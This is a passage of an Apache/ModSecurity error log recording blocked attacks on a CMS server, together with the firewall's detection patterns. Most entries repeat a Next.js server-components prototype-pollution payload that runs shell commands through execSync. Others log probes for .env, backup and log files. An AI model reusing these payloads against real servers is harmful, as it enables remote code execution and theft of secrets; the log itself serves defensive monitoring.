Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`} )..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aU_bAbVQSsbzOWeYNjFSMAAAANQ"] [Sat Dec 27 19:41:19.999497 2025] [:error] [pid 11578:tid 11615] [client 128.199.166.130:30329] [client 128.199.166.130] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`} )..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aVAaP8kd8dP7GnwpbY9mJwAAAYc"] [Sat Dec 27 19:41:21.185634 2025] [:error] [pid 11578:tid 11626] [client 128.199.166.130:52089] [client 128.199.166.130] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`} )..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aVAaQckd8dP7GnwpbY9mMAAAAZI"] [Sun Dec 28 10:46:28.746386 2025] [:error] [pid 3671:tid 3726] [client 164.68.98.218:42230] [client 164.68.98.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`} )..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aVDuZFRwV0WxzBiqEovwZQAAAQQ"] [Sun Dec 28 10:46:28.974468 2025] [:error] [pid 3671:tid 3734] [client 164.68.98.218:42242] [client 164.68.98.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`} )..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aVDuZFRwV0WxzBiqEovwZwAAAQo"] [Sun Dec 28 17:03:07.290980 2025] [:error] [pid 3671:tid 3747] [client 35.183.148.57:49702] [client 35.183.148.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/action"] [unique_id "aVFGq1RwV0WxzBiqEosjlwAAARY"] [Thu Jan 01 14:12:28.926851 2026] [:error] [pid 18610:tid 18627] [client 194.233.94.240:39846] [client 194.233.94.240] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aVZkrM2qIrq54oks-ChDxgAAAYY"] [Thu Jan 01 14:15:15.574566 2026] [access_compat:error] [pid 24034:tid 24051] [client 194.233.94.240:40536] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Thu Jan 01 14:17:05.357045 2026] [:error] [pid 18495:tid 18547] [client 194.233.94.240:52280] [client 194.233.94.240] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aVZlwfFODvMPTlfxZPzizwAAAUA"] [Thu Jan 08 11:34:37.734075 2026] [:error] [pid 517:tid 528] [client 51.158.62.94:47000] [client 51.158.62.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aV96LTZIdbcQPQqwxp5qawAAAMg"] [Fri Jan 09 07:15:12.289188 2026] [:error] [pid 25446:tid 25453] [client 62.146.232.43:57514] [client 62.146.232.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((42899*41232))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aWCO4Pmeoo0gNMMwkak-_AAAAMU"] [Fri Jan 09 07:15:13.294799 2026] [:error] [pid 25446:tid 25455] [client 62.146.232.43:57530] [client 62.146.232.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x5c\\x2242899*41232\\x5c\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_fo..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aWCO4fmeoo0gNMMwkak_AgAAAMc"] [Fri Jan 09 19:04:15.195367 2026] [:error] [pid 24853:tid 24906] [client 180.190.226.249:22628] [client 180.190.226.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aWE1D_Kw7wXCh16_Kk48CAAAAIY"] [Fri Jan 16 05:23:12.194513 2026] [:error] [pid 19684:tid 19768] [client 51.158.62.94:38658] [client 51.158.62.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aWmvIM2Uha5HEVAiJCaLgwAAAEM"] [Sat Jan 17 00:30:13.891348 2026] [authz_host:error] [pid 17051:tid 17100] [client 185.177.72.60:46512] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Sat Jan 17 00:30:13.891379 2026] [authz_core:error] [pid 17051:tid 17100] [client 185.177.72.60:46512] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Sat Jan 17 00:30:19.807538 2026] [access_compat:error] [pid 17050:tid 17054] [client 185.177.72.60:4178] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/phpinfo.php [Sat Jan 17 00:30:22.516083 2026] [:error] [pid 17050:tid 17058] [client 185.177.72.60:4376] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aWq7_rXYIXKPhmP1nYm1SgAAAUU"] [Tue Jan 20 13:32:29.997462 2026] [core:error] [pid 8144:tid 8227] [client 74.7.241.57:42334] AH10244: invalid URI path (/rss/Iceland-lab%27s-testing-suggests-50%-of-cases-have-no-symptoms/21), referer: https://cms-1.dev-unit.com/rss?id=10&page=3 [Tue Jan 20 13:32:35.014880 2026] [core:error] [pid 8240:tid 8259] [client 74.7.241.57:55642] AH10244: invalid URI path (/assets/front/js/%url%), referer: https://cms-1.dev-unit.com/assets/front/js/jquery.magnific-popup.min.js [Tue Jan 20 17:07:14.070955 2026] [autoindex:error] [pid 7851:tid 7882] [client 74.7.243.204:40248] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.cms-1.dev-unit.com/assets/front/img [Thu Jan 22 17:56:26.860812 2026] [:error] [pid 15707:tid 15833] [client 5.78.79.58:54530] [client 5.78.79.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXJIqlgIUiO0ct1AZhpRwAAAAQw"] [Thu Jan 22 17:56:31.446792 2026] [:error] [pid 23829:tid 23897] [client 5.78.79.58:54532] [client 5.78.79.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXJIr0h2OoOxFPIh5RHTFgAAAAw"] [Thu Jan 22 17:56:38.516160 2026] [:error] [pid 23833:tid 23930] [client 103.55.163.194:21519] [client 103.55.163.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXJItso_-i6oc32FN_gRPQAAAIM"] [Fri Jan 23 00:00:55.820715 2026] [:error] [pid 23831:tid 23952] [client 52.203.230.116:26582] [client 52.203.230.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aXKeF9peb0TUdksM02CSIwAAAFg"] [Fri Jan 23 00:00:56.205006 2026] [:error] [pid 1410:tid 1444] [client 52.203.230.116:62085] [client 52.203.230.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo 